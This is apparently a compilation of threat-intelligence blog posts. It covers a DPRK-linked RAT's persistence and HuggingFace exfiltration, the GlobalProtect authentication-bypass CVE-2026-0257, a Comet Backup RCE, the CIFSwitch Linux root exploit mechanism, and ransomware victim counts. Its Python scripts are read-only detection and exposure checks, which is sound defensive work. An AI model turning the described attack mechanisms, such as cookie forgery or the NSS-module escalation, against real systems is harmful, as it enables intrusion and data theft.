Persistence is established across Windows, macOS, and Linux using various techniques. On Windows, it creates a scheduled task \MicrosoftSystem64 and a Run registry key; on macOS, a LaunchAgent plist ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist; and on Linux, a systemd user service ~/.config/systemd/user/MicrosoftSystem64.service and an XDG autostart desktop entry. The malware also includes a self-update mechanism, checking the HuggingFace repository every 24 hours for newer versions and replacing its own executable if an update is available. This enables the threat actor to maintain control and evolve the malware's capabilities without direct re-infection.
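A read-only host check for the persistence artifacts and the masqueraded process name described above, as an added example written for this article rather than tooling from the researchers. It uses the LaunchAgent and systemd paths quoted in the text; the XDG autostart entry is searched by content under ~/.config/autostart because the write-up gives no file name for it, and the Windows scheduled task and Run key are outside this POSIX-only check. The `demo_on_fixture` function builds a constructed directory tree so the output can be seen without an infected host.

```python
"""Added example (not the researchers' tooling): a read-only host check for the
persistence artifacts and the masqueraded process name reported above. It looks
for the macOS LaunchAgent plist and the Linux systemd user unit at the quoted
paths, for an XDG autostart entry that references the process name, and for a
running process carrying that name.

Assumptions: the XDG autostart entry is searched by content under
~/.config/autostart because the write-up gives no file name for it; the Windows
scheduled task and Run key are outside this POSIX-only check; `home` and
`proc_root` are parameters so the check can be pointed at a mounted image, and
`demo_on_fixture` builds a constructed directory tree to show the output.
"""
import tempfile
from pathlib import Path

PROCESS_NAME = "MicrosoftSystem64"
# Paths quoted in the analysis above, relative to the user's home directory.
PERSISTENCE_PATHS = (
    "Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist",
    ".config/systemd/user/MicrosoftSystem64.service",
)


def find_persistence_artifacts(home: Path) -> list[str]:
    """Return artifact paths under `home` that match the reported persistence."""
    found = [str(home / rel) for rel in PERSISTENCE_PATHS if (home / rel).exists()]
    # Assumption: the XDG autostart entry sits in ~/.config/autostart and names
    # the process in its Exec= line (or elsewhere in the file).
    autostart = home / ".config" / "autostart"
    if autostart.is_dir():
        for entry in sorted(autostart.glob("*.desktop")):
            try:
                if PROCESS_NAME in entry.read_text(errors="replace"):
                    found.append(str(entry))
            except OSError:
                continue
    return found


def find_masquerading_processes(proc_root: Path = Path("/proc")) -> list[int]:
    """Return PIDs whose comm or argv[0] carries the masqueraded title.
    comm is capped at 15 characters on Linux, so the truncated form is matched too."""
    comm_forms = {PROCESS_NAME, PROCESS_NAME[:15]}
    pids = []
    if not proc_root.is_dir():
        return pids
    for d in proc_root.iterdir():
        if not d.name.isdigit():
            continue
        try:
            comm = (d / "comm").read_text(errors="replace").strip()
            argv0 = (d / "cmdline").read_bytes().split(b"\0", 1)[0].decode(errors="replace")
        except OSError:
            continue
        if comm in comm_forms or Path(argv0).name == PROCESS_NAME:
            pids.append(int(d.name))
    return sorted(pids)


def demo_on_fixture() -> dict:
    """Build a constructed home and /proc tree containing the artifacts, then run
    both checks against it. Everything written here is fabricated sample data."""
    with tempfile.TemporaryDirectory() as tmp:
        home, proc = Path(tmp) / "home", Path(tmp) / "proc"
        (home / "Library/LaunchAgents").mkdir(parents=True)
        (home / PERSISTENCE_PATHS[0]).write_text("<plist/>")  # constructed
        (home / ".config/autostart").mkdir(parents=True)
        (home / ".config/autostart/keeper.desktop").write_text(
            "[Desktop Entry]\nExec=/tmp/MicrosoftSystem64\n")  # constructed
        (home / ".config/autostart/other.desktop").write_text(
            "[Desktop Entry]\nExec=/usr/bin/true\n")
        for pid, comm, argv in ((123, "MicrosoftSystem", b"MicrosoftSystem64\0--x\0"),
                                (456, "bash", b"bash\0")):
            (proc / str(pid)).mkdir(parents=True)
            (proc / str(pid) / "comm").write_text(comm + "\n")
            (proc / str(pid) / "cmdline").write_bytes(argv)
        (proc / "self").mkdir()
        return {
            "artifacts": [Path(p).name for p in find_persistence_artifacts(home)],
            "pids": find_masquerading_processes(proc),
        }


if __name__ == "__main__":
    print(demo_on_fixture())
    print("live artifacts:", find_persistence_artifacts(Path.home()))
    print("live processes:", find_masquerading_processes())
```

Run it against every interactive user's home directory, not only the current one: the systemd unit and LaunchAgent are per-user, so a single-user sweep misses infections under other accounts.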
### Attacker Infrastructure and Active Victim Data

A live probe of the attacker's HuggingFace infrastructure on May 28, 2026, confirmed the active operation of the exfiltration pipeline with real victims. The FAMOUS CHOLLIMA group operates two HuggingFace accounts: Lordplay (created 2025-11-24), previously used for binary hosting and now disabled by HuggingFace, and jpeek998 (created 2026-05-15), which is currently fully active for data exfiltration. Using the embedded token, three private datasets were enumerated under jpeek998, containing data from two active victims:

| Dataset | Victim | Type | Files | Time Range (UTC) | Size |
|---|---|---|---|---|---|
| jpeek998/linux_ubuntu_f083ccb52684 | Linux (Ubuntu) | Screenshots (base64 PNG) | 323 | May 27 23:51 to May 28 05:14 | ~167 MB |
| jpeek998/win_wulin_e8bc41d9aca8 | Windows (wulin) | Screenshots (base64 PNG) | 94 | May 28 03:41 to May 28 05:14 | ~16 MB |
| jpeek998/win_wulin_e8bc41d9aca8_scan_files | Windows (wulin) | Stolen credential files (gzip) | 1 | May 28 03:43 | 500 MB |

Analysis of the wulin victim's 500 MB credential archive revealed 1,097 credential files, including SSH keys, Chrome and Edge login data, Claude Desktop app data, NVIDIA app credentials, WeChat session data, HuaYoungBrowser data, and Remote Desktop connection files. The Linux victim's desktop screenshots displayed a crypto trading terminal and Python scripts, while the Windows victim's showed ChatGPT, a JoinQuant algorithmic trading platform, and VS Code browsing cryptocurrency exchanges. Both profiles indicate cryptocurrency traders as targets, aligning with the RAT's specialized capabilities.

More details on the broader campaign lineage and FAMOUS CHOLLIMA's tactics can be found in our APT Groups Tracking research.

### What Vulnerabilities are Threat Actors Exploiting in Palo Alto GlobalProtect VPNs?

Palo Alto Networks is currently addressing a High-severity authentication bypass vulnerability, CVE-2026-0257, within its PAN-OS GlobalProtect VPN software, which is actively being exploited in the wild.
This flaw enables attackers to establish unauthorized VPN connections, potentially breaching corporate networks. The CVE-2026-0257 vulnerability was initially rated Medium due to specific configuration prerequisites, namely requiring devices to have authentication override cookies enabled and a particular certificate setup. However, the severity rating was elevated to High after Palo Alto Networks confirmed active exploitation attempts against unpatched devices lacking mitigations.

Security firm Rapid7 reported observing successful exploitation against numerous customers starting as early as May 17, 2026. These attacks involve threat actors authenticating to GlobalProtect gateways by forging authentication override cookies that target local administrator accounts. The initial waves of attacks were traced back to infrastructure hosted by Vultr on May 18, followed by a second wave from Dromatics Systems on May 21.

The underlying mechanism of CVE-2026-0257 stems from PAN-OS's insufficient validation of authentication override cookies. When the same certificate is used for both HTTPS services and authentication override cookies, attackers can obtain the public key via the HTTPS session. This allows them to forge valid authentication cookies that the device accepts as legitimate without proper signature verification.

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-0257 to its Known Exploited Vulnerabilities catalog, mandating federal agencies to mitigate the flaw by June 1, 2026. Organizations using affected GlobalProtect VPN devices are urged to install the latest security updates immediately or disable the authentication override feature, or utilize a distinct certificate for this feature. More information on addressing such vulnerabilities can be found in our Vulnerability Management Strategies guide.

### How Are State-Sponsored Groups Escalating Cyber Attacks on Critical Infrastructure?
Cyber attacks against critical infrastructure sectors are increasingly shifting from espionage to physical disruption, with state-sponsored groups deploying more aggressive tactics. Recent reports highlight a surge in incidents attributed to Iranian-affiliated cyber actors and China-aligned actors, demonstrating advanced capabilities and intent to cause tangible damage. The Polish ABW warned on May 11, 2026, that cyberattacks are moving towards physical disruption, often exploiting poorly secured industrial systems.

In March 2026, the LA County Metropolitan Transportation Authority (LACMTA), or LA Metro, experienced internal operational disruptions following a breach linked to Iranian state-sponsored hackers. The pro-Iran hacktivist group Ababil of Minab claimed responsibility, asserting they wiped hundreds of terabytes of data and exfiltrated over 1TB of files, though bus and rail services remained unaffected. Further, on April 7, CISA, the FBI, and the National Security Agency jointly warned that Iranian-affiliated APT actors, including the CyberAv3ngers (aka Shahid Kaveh Group), were exploiting programmable logic controllers across U.S. critical infrastructure in sectors such as Government Services, Water and Wastewater Systems, and Energy.

The Stryker Corporation, a major medical technology giant, was hit by a destructive "wiper" attack in March 2026, attributed to an Iran-aligned hacktivist group. This attack, aimed at destroying systems rather than extortion, forced entire offices to shut down operations and exposed vulnerabilities in the healthcare supply chain.

Simultaneously, China-aligned actors orchestrated campaigns like "Salt Typhoon" and UAT-7290. Salt Typhoon maintained deep, persistent access inside U.S. telecommunications carriers and government communications through early 2026, mapping critical digital routing infrastructure. UAT-7290 exploited unpatched vulnerabilities in edge network devices of U.S. and allied telecom providers, establishing permanent malware footholds capable of intercepting or shutting down data flows.

Adding another layer of complexity, AI-driven ransomware campaigns, utilizing tools like the "Tsundere Bot" and automated scanning, have emerged in Q1/Q2 2026. These campaigns autonomously handle network reconnaissance, scan U.S. municipal utilities for vulnerabilities, and execute credential theft without human intervention, leading to a 62 percent higher cyber attack frequency in the U.S. compared to the global average. A ransomware attack on Brightspeed, a major U.S. broadband and telecommunications provider, in early 2026, disrupted back-end operations and highlighted the vulnerability of localized internet infrastructure to supply-chain extortion.

### Does a Critical RCE Flaw in Comet Backup Server Expose Customer Data?

A critical Remote Code Execution (RCE) vulnerability, CVE-2026-32999, has been identified in Comet Backup server software, posing a severe risk to enterprise backup environments. This flaw carries an alarming CVSS score of 9.1, indicating its high potential for impact and ease of exploitation. The vulnerability affects all Comet Backup product versions prior to 26.4.3 and 26.5.0, making immediate patching essential for self-hosted administrators.

The core issue resides in specific administrative branding permissions within the Comet Backup system. A tenant administrator, under certain conditions, can upload custom .dll or .so executables for code signing. Subsequently, the attacker can generate a malicious backup-tool client which, when executed, compromises the platform. This malicious action effectively bypasses established tenancy boundaries, allowing unauthorized code execution within the cometd process.

Successful exploitation of CVE-2026-32999 grants threat actors extensive control and access. This includes full access to critical user data stored in the config.cfg file, the ability to harvest backed-up data from remote devices containing the backup-tool client, and the capability to stop, replace, or completely remove the Comet Server installation. Furthermore, the exploit permits code execution on behalf of a privileged user on any connected endpoint, presenting a profound risk to data privacy and system integrity. While Comet Hosted servers have already been automatically upgraded by the vendor, self-hosted deployment teams must manually update their instances to version 26.4.3, 26.5.0, or higher from the official download portal to mitigate the risk of active compromise.

### What is the Impact of the CIFSwitch Linux Privilege Escalation Flaw?

A newly discovered local privilege escalation (LPE) vulnerability, dubbed CIFSwitch, impacts the Linux kernel CIFS subsystem and cifs-utils, allowing unprivileged users to gain root privileges on affected systems. This flaw, introduced nearly two decades ago in 2007, exploits a failure in the Linux kernel's CIFS subsystem to verify the origin of cifs.spnego key requests. The CIFS (Common Internet File System) protocol enables Linux systems to access remote files, folders, and devices over a network, often using Kerberos for authentication.

An unprivileged user can forge a cifs.spnego request, which is normally used by the Linux keyring subsystem to obtain authentication data for the CIFS/SMB client. This forged request triggers the normal authentication workflow, deceiving the root-privileged cifs.upcall helper into trusting attacker-controlled fields. By manipulating these fields to force a namespace switch and then triggering a Name Service Switch (NSS) lookup before privileges are dropped, a local attacker can load a malicious NSS module and achieve root code execution.
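Whether a given host is exposed to CIFSwitch comes down to a handful of local conditions: the kernel version, whether the cifs module is loaded or blacklisted, whether the cifs-utils helper (cifs.upcall) is installed, and whether unprivileged user namespaces are available. The following read-only exposure check gathers exactly those inputs and mirrors the three mitigations the advisory recommends. It is an added example written for this article, not the published PoC or any distribution's tooling, and it does not attempt the key-request trick itself; the file locations are the usual Linux ones, and LSM policy (SELinux/AppArmor) is not assessed.

```python
"""Added example (not the researchers' PoC and not distribution tooling): a
read-only exposure check for CIFSwitch that gathers the preconditions named in
this write-up: kernel version, whether the cifs module is loaded or blacklisted,
whether cifs-utils (cifs.upcall) is present, and whether unprivileged user
namespaces are enabled. It does not attempt the key-request trick itself.

Assumptions: /proc/modules, /etc/modprobe.d and the two sysctl files are the
usual Linux locations; cifs.upcall is resolved via PATH with /usr/sbin as a
fallback; kernels below 6.14 are reported as 'possibly-affected' because the
write-up notes that some older variants are also vulnerable; SELinux/AppArmor
policy is not assessed.
"""
import re
import shutil
from pathlib import Path
from typing import Optional

CONFIRMED_MIN_KERNEL = (6, 14)  # lower bound of the confirmed range in the write-up


def parse_kernel_version(release: str) -> tuple[int, int]:
    """'6.14.0-29-generic' -> (6, 14)."""
    m = re.match(r"^(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2))


def cifs_module_state(proc_modules: str, modprobe_confs: list[str]) -> str:
    """'loaded', 'blacklisted' or 'available', from /proc/modules text and the
    contents of /etc/modprobe.d/*.conf."""
    if any(line.split(" ")[0] == "cifs" for line in proc_modules.splitlines()):
        return "loaded"
    blacklist_re = re.compile(
        r"^\s*(blacklist\s+cifs|install\s+cifs\s+/bin/(false|true))\b", re.M)
    if any(blacklist_re.search(conf) for conf in modprobe_confs):
        return "blacklisted"
    return "available"


def userns_enabled(max_user_namespaces: Optional[str],
                   unprivileged_userns_clone: Optional[str]) -> bool:
    """user.max_user_namespaces=0 disables creation for everyone; the Debian and
    Ubuntu kernel.unprivileged_userns_clone=0 knob disables it for unprivileged
    users. A missing file (None) means the knob does not exist on this kernel."""
    if max_user_namespaces is not None and max_user_namespaces.strip() == "0":
        return False
    if unprivileged_userns_clone is not None and unprivileged_userns_clone.strip() == "0":
        return False
    return True


def assess(kernel_release: str, module_state: str,
           cifs_utils_present: bool, userns: bool) -> dict:
    """Combine the inputs the way the write-up's preconditions do."""
    ver = parse_kernel_version(kernel_release)
    kernel_flag = "confirmed-range" if ver >= CONFIRMED_MIN_KERNEL else "possibly-affected"
    # Module usable, helper present and user namespaces allowed are all required;
    # each mitigation in the write-up removes one of them.
    exposed = module_state != "blacklisted" and cifs_utils_present and userns
    return {"kernel": kernel_flag, "cifs_module": module_state,
            "cifs_utils": cifs_utils_present, "userns": userns, "exposed": exposed}


def _read(path: str) -> Optional[str]:
    try:
        return Path(path).read_text()
    except OSError:
        return None


def assess_live() -> dict:
    """Gather the inputs from the running host and assess them."""
    import platform
    conf_dir = Path("/etc/modprobe.d")
    confs = ([p.read_text(errors="replace") for p in conf_dir.glob("*.conf")]
             if conf_dir.is_dir() else [])
    state = cifs_module_state(_read("/proc/modules") or "", confs)
    upcall_present = bool(shutil.which("cifs.upcall")) or Path("/usr/sbin/cifs.upcall").exists()
    return assess(platform.release(), state, upcall_present,
                  userns_enabled(_read("/proc/sys/user/max_user_namespaces"),
                                 _read("/proc/sys/kernel/unprivileged_userns_clone")))


if __name__ == "__main__":
    print(assess_live())
```

The `exposed` flag is deliberately conservative: a module that is merely "available" (not loaded, not blacklisted) still counts, because an unblacklisted module can be autoloaded on first use.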
The CIFSwitch vulnerability is not universal and its exploitation depends on several factors, including a vulnerable kernel version (versions 6.14 and higher, with some older variants also affected), a vulnerable cifs-utils version, the availability of user namespaces, and permissive SELinux/AppArmor policies. Distributions confirmed as vulnerable with their default configurations include Linux Mint 21.3/22.3, CentOS Stream 9, Rocky Linux 9, AlmaLinux 9, Kali Linux 2021.4-2026.1, and SLES 15 SP7. Other distributions like Ubuntu, Debian, Pop!_OS, openSUSE, Oracle Linux, and Amazon Linux may also be vulnerable if cifs-utils is installed.

A kernel patch (commit 3da1fdf4efbc490041eb4f836bf596201203f8f2) has been implemented upstream to add validation of cifs.spnego request origins. Organizations are advised to disable or blacklist the CIFS module if unused, remove the cifs-utils package if unnecessary, or disable unprivileged user namespaces to mitigate the risk. A proof-of-concept (PoC) exploit for CIFSwitch has been published to aid in validating applied patches and mitigations.

### Technical Takeaways

- The DPRK-linked actor FAMOUS CHOLLIMA is using MicrosoftSystem64, a multi-platform RAT, to actively compromise cryptocurrency traders, exfiltrating over 1TB of data including 1,097 credential files and 417 screenshots, leveraging HuggingFace for C2 and data exfiltration.
- Palo Alto Networks' PAN-OS GlobalProtect VPN is experiencing active exploitation of CVE-2026-0257, a High-severity authentication bypass flaw, with attacks observed from Vultr and Dromatics Systems infrastructure since May 17, 2026.
- State-sponsored groups, including Iranian-affiliated cyber actors (Ababil of Minab, CyberAv3ngers) and China-aligned actors (Salt Typhoon, UAT-7290), are escalating attacks on critical infrastructure, demonstrating intent for physical disruption and data wiping, as seen with LA Metro and Stryker Corporation.
- A critical Remote Code Execution (RCE) vulnerability, CVE-2026-32999 (CVSS 9.1), in Comet Backup server allows tenant administrators to achieve full server compromise and data exfiltration if not patched to versions 26.4.3 or 26.5.0 or higher.
- The CIFSwitch local privilege escalation flaw in the Linux kernel CIFS and cifs-utils allows unprivileged users to gain root access on multiple Linux distributions, stemming from a 19-year-old vulnerability now addressed by kernel patch 3da1fdf.

---

## Palo Alto GlobalProtect CVE-2026-0257 (CVSS 7.8) Auth Bypass

- URL: https://purple-ops.io/blog/palo-alto-globalprotect-cve-2026-0257
- Date: 2026-05-31
- Category: CVE Analysis
- Tags: palo-alto, globalprotect, cve-2026-0257, authentication-bypass, active-exploitation
- Reading time: 5 min | CVSS: 7.8

**Summary:** Palo Alto Networks GlobalProtect CVE-2026-0257 is an authentication bypass vulnerability actively exploited by threat actors for unauthorized VPN access.

Palo Alto GlobalProtect CVE-2026-0257 (CVSS 7.8) Auth Bypass

Palo Alto Networks has warned about CVE-2026-0257, an authentication bypass vulnerability in its PAN-OS and Prisma Access software. This issue affects specific GlobalProtect configurations. The vulnerability has a CVSS score of 7.8 (High severity by NVD, medium by Palo Alto Networks), allowing unauthorized actors to establish VPN connections and bypass security restrictions. The flaw impacts GlobalProtect portal and gateway deployments under specific certificate and authentication override cookie settings.

Security research firms confirm CVE-2026-0257 is actively exploited. Attacks target unpatched devices without implemented mitigations. Initial exploitation attempts occurred on May 17, 2026, followed by a second wave on May 21, 2026. The same threat actor carried out these exploitation efforts.
Successful exploitation of this authentication bypass gives attackers unauthorized access to internal networks via VPN, posing a significant risk to affected organizations. While no follow-on activities within compromised customer environments have been reported immediately after VPN establishment, further compromise is possible. Organizations should review configurations, apply vendor patches, or implement recommended temporary mitigations immediately.

### What is CVE-2026-0257 and its technical nature?

CVE-2026-0257 is an authentication bypass vulnerability within the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS software and Prisma Access. This flaw, with a CVSS score of 7.8, bypasses security protocols designed to authenticate users before granting network access. The vulnerability occurs under specific preconditions: when the GlobalProtect portal or gateway is configured, when authentication override cookies are enabled, and when a particular certificate configuration is active.

An attacker who exploits CVE-2026-0257 can bypass the normal authentication process for GlobalProtect VPN connections. This allows them to establish an unauthorized VPN session, gaining a foothold within an organization's internal network perimeter. The flaw's technical nature involves how authentication override cookies and certificate configurations are handled, creating a logical vulnerability that allows an unauthenticated adversary to gain privileged access to the VPN service. While the base CVSS score is "High" severity, active exploitation on an edge-facing VPN appliance increases its practical criticality.

### Impact

The impact of CVE-2026-0257 is substantial because it is an authentication bypass on an edge-facing enterprise VPN appliance. An attacker exploiting this vulnerability can establish an unauthorized VPN connection to the victim organization's internal network.
This direct access bypasses the primary security control for remote access, giving the attacker a pathway into the corporate infrastructure. Immediate risks include unauthorized data access, network reconnaissance, and potential for lateral movement within the compromised environment.

Organizations using Palo Alto Networks PAN-OS or Prisma Access with the GlobalProtect portal or gateway configured under the specific vulnerable conditions are at risk. The CVSS score of 7.8 indicates high severity, showing the potential for full network access compromise. Initial observations of exploitation did not immediately report follow-on activity within internal networks, but establishing an unauthorized VPN session is a critical step towards further actions. This could involve deploying malware, exfiltrating sensitive data, or disrupting critical services, depending on attacker goals and network segmentation.

### Exploitation Chain

Exploitation of CVE-2026-0257 begins with an adversary targeting Palo Alto Networks PAN-OS or Prisma Access deployments that use the GlobalProtect portal or gateway. Successful exploitation requires specific preconditions in the targeted environment:

- The GlobalProtect portal or gateway must be configured and running.
- Authentication override cookies must be enabled.
- A specific, unstated certificate configuration must be active.

When these conditions are met, the vulnerability allows an attacker to bypass standard authentication mechanisms. This means they can avoid providing legitimate credentials or satisfying multi-factor authentication, if configured. A successful bypass immediately results in an unauthorized VPN connection. Rapid7's observations of in-the-wild exploitation showed "VPN IP assignment following the cookie authentication," which directly led to the attacker accessing the internal network.
While public Proof-of-Concept (PoC) code was not explicitly mentioned, confirmed active exploitation suggests threat actors have developed and deployed effective methods to use this flaw. Observed attacks, occurring on May 17, 2026, and in a second wave on May 21, 2026, demonstrate a clear threat.

Further analysis of this vulnerability and its exploitation can be found in our prior investigations, such as our detailed post on CVE-2026-0257 in Palo Alto GlobalProtect and another concerning the exploit in Palo Alto CVE-2026-0257. These resources provide additional context and technical insights into the exploit.

### How is CVE-2026-0257 being exploited?

CVE-2026-0257 is confirmed under active exploitation by threat actors. Palo Alto Networks initially reported "limited exploit attempts" against unpatched PAN-OS devices without necessary mitigations. Cybersecurity firm Rapid7 corroborated this, identifying successful exploitation in multiple customer environments.

The earliest confirmed exploitation attempts occurred on May 17, 2026. A second, distinct wave of exploitation was observed on May 21, 2026. The same threat actor carried out both sets of activities, showing a persistent and targeted campaign. During these attacks, Rapid7 noted attackers successfully bypassed cookie authentication, leading to the assignment of VPN IP addresses. This allowed the attacker to establish an unauthorized VPN session and access the victim's internal network.

While initial observed impact did not include immediate follow-on activity within compromised networks, establishing a direct internal network foothold signifies a critical security breach. This active exploitation shows the urgency for organizations to address CVE-2026-0257 promptly, as unpatched systems remain vulnerable.

### Which products and configurations are affected by CVE-2026-0257?

CVE-2026-0257 affects Palo Alto Networks products that use the GlobalProtect VPN functionality under specific configurations.
It is not a broad vulnerability affecting all installations of PAN-OS or Prisma Access. Critical dependencies for exploitability are the specific configurations of the GlobalProtect portal or gateway. Affected product lines and the conditions making them vulnerable are:

- **Palo Alto Networks PAN-OS® software:**
  - Affected when using the GlobalProtect portal.
  - Affected when using the GlobalProtect gateway.
  - The vulnerability appears only when authentication override cookies are enabled on these GlobalProtect components.
  - A specific, undescribed certificate configuration must be present with the enabled authentication override cookies.
- **Palo Alto Networks Prisma Access:** Affected under the same specific conditions as PAN-OS related to GlobalProtect portal or gateway configuration, enabled authentication override cookies, and the specific certificate configuration.

Administrators must review their GlobalProtect configurations to determine if their deployments meet these specific criteria, as all three conditions are required for the vulnerability to be exploitable. Research findings do not specify particular PAN-OS version numbers, suggesting the issue lies in the configuration logic itself when these specific settings are applied across multiple versions.

### Detection

Detecting CVE-2026-0257 exploitation primarily involves monitoring for anomalous VPN connections and reviewing authentication logs for bypass activity. Since the exploit allows unauthorized VPN IP assignment and internal network access, security teams should focus on these areas.

Detection guidance:

**VPN Connection Logs Review:**

- Monitor GlobalProtect gateway and portal logs for successful VPN connections from unusual or unauthorized source IP addresses.
- Look for VPN sessions established without the expected authentication sequence, such as a lack of multi-factor authentication (MFA) prompts where MFA is typically enforced.
Identify VPN sessions where the authentication method appears to rely solely on "cookie authentication" without prior credential validation, especially if this differs from standard procedures. Examine logs from May 17, 2026, and May 21, 2026, and subsequent dates, as these are periods when active exploitation was observed. Authentication Override Cookie Monitoring: Audit configurations related to authentication override cookies on GlobalProtect portal and gateway for unauthorized changes or unusual activity. Monitor for events showing the creation, modification, or suspicious use of these cookies. Certificate Configuration Auditing: Regularly audit certificates for GlobalProtect, especially those for authentication override features. Anomalies could indicate preparation for or actual exploitation. Network Activity Monitoring: After a VPN connection, monitor internal network traffic from newly assigned VPN IP addresses for unusual patterns, such as: Access to sensitive systems or data that the VPN user should not normally access. Attempts at lateral movement or internal network reconnaissance. Unexpected bandwidth usage or connection patterns. EDR/Endpoint Telemetry: While the initial exploit is network-based, any follow-on activity by an attacker after establishing a VPN connection would likely generate endpoint telemetry. Monitor endpoints for: New process executions from VPN user sessions outside the baseline. Unusual file access or creation. Suspicious network connections initiated by users authenticated via VPN. Robust logging and centralized security information and event management (SIEM) solutions are critical for collecting and analyzing data to detect CVE-2026-0257 exploitation. Remediation Addressing CVE-2026-0257 requires immediate action. Prioritize patching, and if immediate patching is not possible, implement temporary mitigations. The main remediation strategy is to apply vendor-supplied patches that resolve the authentication bypass vulnerability. 
Specific remediation steps:

- Patch Application: Upgrade Palo Alto Networks PAN-OS software to the patched versions provided by the vendor. Consult the official Palo Alto Networks security advisory for CVE-2026-0257 for the exact patch versions for your PAN-OS release train. For Prisma Access deployments, ensure the cloud service is updated to the patched configuration, as Palo Alto Networks typically manages these; verify status through your Prisma Access dashboard or support channels.
- Temporary Mitigations (if immediate patching is not possible):
  - Disable the Authentication Override Feature: The most direct temporary mitigation is to disable the authentication override feature entirely on your GlobalProtect portal and gateway configurations. This removes one critical precondition for exploitation. Disabling this feature may affect legitimate user workflows that rely on it, so understand its operational use before implementation.
  - Generate a New Exclusive Certificate: If the authentication override feature cannot be disabled, generate a new digital certificate and configure it for exclusive use with the authentication override feature. This isolates the vulnerable configuration and may disrupt the attacker's ability to use the "specific certificate configuration" mentioned.
- Configuration Review and Hardening: Conduct a full review of all GlobalProtect portal and gateway configurations to ensure authentication override cookies are not enabled unnecessarily. Evaluate the necessity of any certificate configurations that interact with authentication processes and consider hardening or reconfiguring them.
- Monitoring: Implement continuous monitoring of VPN access logs and network activity as detailed in the detection section. This ongoing surveillance is crucial even after applying patches or mitigations, to verify their effectiveness and identify any residual or new suspicious activity.
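The "VPN IP assignment without a prior credential login" indicator from the detection guidance above (the same indicator both CVE-2026-0257 articles on this page describe) implemented over log lines, as an added example that is not code from purple-ops.io or from Palo Alto Networks. The log layout, user names and addresses are constructed for the example and do not follow the real PAN-OS system-log schema; map the fields to what your SIEM actually ingests.

```python
"""Added example: flag GlobalProtect-style VPN IP assignments that were reached
by cookie authentication with no preceding credential login, or from a source
IP other than the one that performed the credential login.  The log format is
CONSTRUCTED for this illustration, not the real PAN-OS schema."""
from datetime import datetime, timedelta

# Constructed sample events: <timestamp> <user> <source-ip> <event> <auth-method>
SAMPLE_LOGS = """\
2026-05-21T08:00:01 alice 203.0.113.10 portal-auth password+mfa
2026-05-21T08:00:04 alice 203.0.113.10 gateway-auth cookie
2026-05-21T08:00:05 alice 203.0.113.10 ip-assign cookie
2026-05-21T09:14:33 bob 198.51.100.7 gateway-auth cookie
2026-05-21T09:14:34 bob 198.51.100.7 ip-assign cookie
2026-05-21T10:02:10 carol 192.0.2.55 portal-auth password+mfa
2026-05-21T10:02:12 carol 192.0.2.55 ip-assign cookie
2026-05-21T11:30:00 alice 203.0.113.99 ip-assign cookie
"""

# Methods that prove the user actually presented credentials (constructed names).
CREDENTIAL_METHODS = {"password", "password+mfa", "certificate+password"}


def parse_line(line):
    ts, user, src_ip, event, method = line.split()
    return {"ts": datetime.fromisoformat(ts), "user": user,
            "src_ip": src_ip, "event": event, "method": method}


def find_suspicious_assignments(log_text, window=timedelta(hours=24)):
    """Return (user, src_ip, reason) for every ip-assign event that is not
    backed by a credential-based portal login within `window`, or that comes
    from a different source IP than that login (a cookie replay/forgery cue)."""
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    last_login = {}          # user -> most recent credential-based portal-auth
    findings = []
    for ev in events:
        if ev["event"] == "portal-auth" and ev["method"] in CREDENTIAL_METHODS:
            last_login[ev["user"]] = ev
        elif ev["event"] == "ip-assign":
            login = last_login.get(ev["user"])
            if login is None or ev["ts"] - login["ts"] > window:
                findings.append((ev["user"], ev["src_ip"],
                                 "VPN IP assigned with no prior credential login"))
            elif login["src_ip"] != ev["src_ip"]:
                findings.append((ev["user"], ev["src_ip"],
                                 "cookie used from a source IP other than the credential login"))
    return findings


if __name__ == "__main__":
    for user, src_ip, reason in find_suspicious_assignments(SAMPLE_LOGS):
        print(f"ALERT {user} {src_ip}: {reason}")
```

On the sample, bob's cookie-only assignment and alice's later assignment from a new source address are flagged; carol's credential-backed session is not.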
Organizations should treat CVE-2026-0257 with high urgency due to active exploitation and the critical nature of a VPN authentication bypass.

### Technical Takeaways

- CVE-2026-0257 is an authentication bypass in Palo Alto Networks PAN-OS and Prisma Access GlobalProtect components, with a CVSS score of 7.8.
- The vulnerability is actively exploited, with observed attacks from May 17, 2026, by a consistent threat actor.
- Exploitation allows attackers to establish unauthorized VPN connections and access internal networks without valid credentials.
- The flaw impacts the GlobalProtect portal/gateway when authentication override cookies are enabled and a particular certificate configuration exists.
- Primary remediation is applying vendor-supplied patches; temporary mitigations include disabling authentication override or using an exclusive certificate for this feature.

---

## Nova RALord Ransomware Activity Targets 3 Victims

- URL: https://purple-ops.io/blog/nova-ralord-ransomware-activity
- Date: 2026-05-30
- Category: Ransomware Report
- Tags: nova-ralord, ransomware, threat-intelligence, cybersecurity
- Reading time: 5 min

**Summary:** Nova (RALord) ransomware led recent activity, impacting 3 new victims across diverse sectors and geographies in the last 24 hours.

### Statistical Overview

Victim Totals

- This month: 760
- This quarter: 1538
- Year to date: 4163
- Last 24h: 16

Quarterly Breakdown: Q1: 2631 | Q2: 1538 | Q3: 0 | Q4: 0

Ransomware activity continues to show high volume this quarter, though the last 24-hour period indicates a lower-volume but diverse set of attacks. Nova (RALord) was the most active group in this timeframe, followed by DragonForce and Lapsus.

### Introduction

The past 24 hours saw 16 new ransomware victims reported across varied sectors and geographies. Nova (RALord) emerged as the most active group, followed by DragonForce and Lapsus.
Attackers showed broad targeting, impacting industries from automotive and education to manufacturing and technology.

### Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | Nova (RALord) | 3 | Bc3 tecnologia, Daegu university ai department, Lti services and larick towing | South Korea, United States | Automotive, Education |
| 2 | DragonForce | 2 | Henry molded products likely to engage tag., Shoreline sightseeing | United States | Manufacturing, Hospitality & Travel |
| 3 | Lapsus | 2 | Github internal, Ingka group (ikea) | Netherlands, United States | Retail & Ecommerce, Technology / Software |
| 4 | Bravox | 1 | Academyhealth ?? | United States | Government / Public Sector |
| 5 | CMD | 1 | Lee Law Offices | United States | Legal |
| 6 | Gunra | 1 | Starempire | South Korea | Media & Entertainment |
| 7 | INC Ransom | 1 | www.labexpress.com | United States | Healthcare |
